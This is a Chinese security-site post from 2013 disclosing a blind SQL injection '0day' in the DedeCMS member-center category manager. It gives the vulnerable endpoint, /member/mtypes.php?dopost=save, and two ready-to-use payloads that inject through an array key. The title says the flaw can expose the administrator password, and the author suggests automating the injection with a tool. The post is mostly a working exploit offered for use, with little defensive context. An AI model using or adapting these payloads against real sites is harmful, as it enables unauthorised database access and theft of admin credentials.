• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码

    时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

    需要magic_quotes_gpc = Off,所以说是鸡肋啊.

     

    发生在数组key里的注射漏洞,有点意思.

     搜狗电脑知识网

    这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下

     

    /de/member/mtypes.php?dopost=save

     

    exploit:

    mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r

    mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r

  • 上一篇:利用phpcms v9 0day拿shell+提权
  • 下一篇:土豆网XSS瞎打安检系统管理平台
    • 相关文章
    • 没有相关文章
    共有评论 0相关评论
    发表我的评论
    • 大名:
    • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1